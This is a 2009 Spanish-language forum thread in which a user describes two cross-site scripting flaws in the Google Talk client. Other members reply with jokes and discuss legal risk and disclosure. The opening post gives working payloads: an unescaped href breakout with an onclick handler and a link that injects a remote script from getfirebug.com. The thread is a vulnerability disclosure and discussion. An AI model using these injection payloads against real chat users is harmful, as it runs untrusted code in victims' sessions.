Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.
Cuando escribimos http://<h1>test en realidad se imprime esto:
<a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>xDD y el resultado es algo asi como esto:
(http://www.webcomparte.com/archivos_publicos/imagenes/bugs/gtalk_xss1.png)
Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write
(http://www.webcomparte.com/archivos_publicos/imagenes/bugs/gtalk_xss2.png)
A los que quiean inyectar el firebug pueden escribir estas dos lineas:
Citarhttp://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x='
hacerle click y luego
Citarhttp://'onclick='alert(firebug.init())'x='
y al hacerle click llamarán a firebug :P
Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .
os aburris mucho,verdad¿¿ ;-) ;-) :P
Grandes ;D
que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo??
Saludos
genial ;D
Nah.... Google regala poleras xD
Cita de: janito24 en 21 Octubre 2009, 17:53 PM
Nah.... Google regala poleras xD
enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?
Saludos
Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
Cita de: WHK en 21 Octubre 2009, 20:49 PM
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
jaja ok xD
Saludos
CitarConversando con SirDarckCat estubimos casi toda la noche jugando con el google talk
para mi era medio dia.. XDDD
Gran descubrimiento..
Que descuido de google xDDD
Saludos..
jajaja lo que es el ocio :P
en las salas de chat de www.tagged.com yo hacia lo mismo
jaja hasta que alguien más se dio cuenta, le aviso a Alex y lo remodelaron todo desde 0, ya nada quedo igual :-[
jajaja par de ociosos xDDD
Congrat!
Que grande los chicos!